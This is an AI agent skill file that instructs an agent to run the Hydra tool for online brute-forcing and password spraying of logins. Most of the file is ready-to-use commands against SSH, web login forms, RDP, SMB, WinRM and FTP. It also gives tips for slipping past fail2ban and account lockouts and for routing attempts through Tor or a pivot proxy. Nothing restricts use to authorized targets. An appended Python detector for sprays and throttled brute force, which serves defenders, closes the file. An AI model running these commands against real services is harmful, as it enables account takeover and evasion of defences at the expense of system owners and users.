offensive-tools/cracking/hydra/SKILL.md
Online brute-force and password spraying tool supporting 50+ protocols (SSH, HTTP, FTP, SMB, RDP, WinRM, and more). Use when asked to brute-force logins, perform password spraying, test default credentials, or attack authentication on any network service.
Fast, parallelized online password cracker for 50+ protocols.
```bash
# SSH brute-force
hydra -l admin -P passwords.txt ssh://192.168.1.10

# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Multiple users + passwords
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
```
| Flag | Description |
|------|-------------|
| -l <user> | Single username |
| -L <file> | Username list |
| -p <pass> | Single password |
| -P <file> | Password list |
| -u | Loop users before passwords (default: passwords first) |
| -C <file> | Colon-delimited user:pass list |
| -t <n> | Threads per host (default 16) |
| -T <n> | Total parallel targets |
| -s <port> | Custom port |
| -S | Use SSL/TLS |
| -o <file> | Output found credentials |
| -f | Stop after first valid pair (per host) |
| -F | Stop after first valid pair (all hosts) |
| -v | Verbose |
| -V | Very verbose (show each attempt) |
| -d | Debug |
| -R | Restore previous session |
| -I | Ignore existing restore file (start fresh) |
| -e nsr | Try: n=empty pass, s=user as pass, r=reversed user |
| -w <sec> | Wait time for server response (default 32s) |
| -W <sec> | Wait between connect attempts per thread (rate throttle) |
| -x proto | SOCKS5/HTTP proxy: -x socks5://127.0.0.1:1080 |
ssh, ftp, http-get, http-post-form, https-post-form, smb, rdp, winrm, imap, pop3, smtp, mysql, postgres, mssql, telnet, vnc, ldap2, redis
```bash
# SSH with user list
hydra -L users.txt -P rockyou.txt ssh://10.10.10.10 -t 4

# HTTP form login
hydra -l admin -P passwords.txt 10.10.10.10 http-post-form \
  "/admin/login.php:username=^USER^&password=^PASS^:Wrong password"

# RDP brute-force
hydra -l administrator -P passwords.txt rdp://10.10.10.10

# FTP
hydra -l ftp -P passwords.txt ftp://10.10.10.10

# SMB password spray (single password, many users)
hydra -L users.txt -p "Summer2024!" smb://10.10.10.10

# WinRM
hydra -l administrator -P passwords.txt winrm://10.10.10.10

# Rate-limited (avoid lockouts)
hydra -l admin -P passwords.txt ssh://10.10.10.10 -t 1 -W 3

# Route through SOCKS5 (Tor or pivoting)
hydra -l admin -P passwords.txt -x socks5://127.0.0.1:1080 ssh://10.10.10.10

# HTTP proxy
hydra -l admin -P passwords.txt -x http://127.0.0.1:8080 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid"
```
- -e nsr for quick wins (null, same as user, reversed)
- -t 1-4 for protocols with lockout policies (RDP, SMB, WinRM)
- -W 3 adds 3s between connect attempts per thread, avoids fail2ban bans
- -w controls response timeout; increase for slow targets (e.g., -w 10)
- failure_message from the response body
- -I to ignore leftover restore files from previous interrupted runs

| File | When to load |
|------|--------------|
| references/protocols.md | Module syntax for each protocol, POST form detection, HTTPS handling |
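
From the defending side, the spray and throttled runs above are visible in the target's authentication log: a spray leaves one failure per account, so per-account lockout counters never trip, and a throttled run only shows up when failures are counted over a long window. The detector below is an added example, not part of the original skill; the log lines are constructed, and the function names, window and thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth.log lines (documentation IP ranges, made-up host and users).
SAMPLE = """\
Jun 12 10:00:00 web1 sshd[101]: Failed password for invalid user alice from 198.51.100.7 port 40001 ssh2
Jun 12 10:00:03 web1 sshd[102]: Failed password for bob from 198.51.100.7 port 40002 ssh2
Jun 12 10:00:06 web1 sshd[103]: Failed password for carol from 198.51.100.7 port 40003 ssh2
Jun 12 10:00:09 web1 sshd[104]: Failed password for invalid user dave from 198.51.100.7 port 40004 ssh2
Jun 12 10:05:00 web1 sshd[110]: Failed password for admin from 203.0.113.5 port 50001 ssh2
Jun 12 10:09:00 web1 sshd[111]: Failed password for admin from 203.0.113.5 port 50002 ssh2
Jun 12 10:13:00 web1 sshd[112]: Failed password for admin from 203.0.113.5 port 50003 ssh2
Jun 12 10:17:00 web1 sshd[113]: Failed password for admin from 203.0.113.5 port 50004 ssh2
Jun 12 10:21:00 web1 sshd[114]: Failed password for admin from 203.0.113.5 port 50005 ssh2
Jun 12 10:30:00 web1 sshd[120]: Failed password for bob from 192.0.2.9 port 60001 ssh2
""".splitlines()

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def parse(lines, year=2024):
    """Yield (timestamp, source_ip, username) per failed login; syslog omits the year."""
    for line in lines:
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"]

def classify(lines, window=timedelta(hours=1), min_attempts=5, min_users=4):
    """Label each source IP 'spray' or 'brute-force' from failures inside a sliding window."""
    by_ip, verdicts = defaultdict(list), {}
    for ts, ip, user in sorted(parse(lines)):
        by_ip[ip].append((ts, user))
    for ip, events in by_ip.items():
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # drop failures that fell out of the window
            users = {u for _, u in events[start:end + 1]}
            if len(users) >= min_users:          # many accounts, few tries each
                verdicts[ip] = "spray"
                break
            if end - start + 1 >= min_attempts:  # many tries against few accounts
                verdicts[ip] = "brute-force"
                break
    return verdicts
```

With the one-hour default both sources are flagged; shrinking the window to one minute still catches the spray but misses the throttled run against admin, which is why the window has to be longer than the pacing a throttled client can afford.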